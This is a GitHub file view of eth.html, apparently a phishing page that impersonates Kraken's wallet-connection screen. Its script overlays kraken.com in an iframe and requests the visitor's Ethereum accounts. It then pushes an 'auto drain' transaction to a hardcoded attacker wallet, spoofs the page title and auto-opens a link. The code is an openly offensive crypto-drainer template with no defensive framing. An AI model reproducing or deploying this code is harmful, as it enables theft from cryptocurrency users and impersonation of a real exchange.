-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy patheth.html
More file actions
79 lines (69 loc) · 2.47 KB
/
eth.html
File metadata and controls
79 lines (69 loc) · 2.47 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>kraken.com - Wallet Connect</title>
<style>
body, html { margin:0; padding:0; height:100%; background:#0a1a2a; color:#e0f7fa; font-family:system-ui; }
.container { padding:20px; text-align:center; }
.kraken { fontcast:900; font-size:32px; color:#00c853; }
.msg { margin:16px 0; font-size:18px; color:#80deea; }
.loader { width:40px; height:40px; border:4px solid #1a3a5c; border-top:4px solid #00c853; border-radius:50%; animation:spin 1s infinite linear; margin:20px auto; }
@keyframes spin { to { transform:rotate(360deg); } }
</style>
</head>
<body>
<div class="container">
<div class="kraken">KRAKEN</div>
<h2>Secure Wallet Connection</h2>
<div class="loader"></div>
<p class="msg">Connecting to your wallet...</p>
</div>
<!-- HIDDEN SPOOF PAGE -->
<iframe id="spoof" style="position:fixed; top:0; left:0; width:100%; height:100%; border:none; z-index:9999; display:none;"></iframe>
<script>
// === FULL SPOOF KRAKEN.COM ===
const SPOOF_URL = "https://kraken.com"; // Bisa ganti ke halaman login Kraken
const ATTACKER_WALLET = "0x32B4Ae54669DE1A3f296E15Aa5aE780c0c1e706F";
// 1. Buka Kraken di iframe tersembunyi
const iframe = document.getElementById('spoof');
iframe.src = SPOOF_URL;
iframe.style.display = 'block';
// 2. Auto trigger setelah load
iframe.onload = () => {
setTimeout(autoConnect, 800);
};
async function autoConnect() {
if (!window.ethereum) return;
try {
// Auto connect
const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
const user = accounts[0];
// Spoof title
document.title = "kraken.com - Wallet Connected";
// Auto drain
setTimeout(async () => {
await window.ethereum.request({
method: 'eth_sendTransaction',
params: [{
from: user,
to: ATTACKER_WALLET,
value: '0x0',
gas: '0x5208'
}]
});
document.title = "kraken.com - Synced";
}, 1000);
} catch (e) { console.error(e); }
}
// === ALTERNATIF: a href + target="_blank" (NO GITHUB.IO) ===
setTimeout(() => {
const link = document.createElement('a');
link.href = "https://kraken.com";
link.target = "_blank";
link.rel = "noopener";
link.click();
}, 300);
</script>
</body>
</html>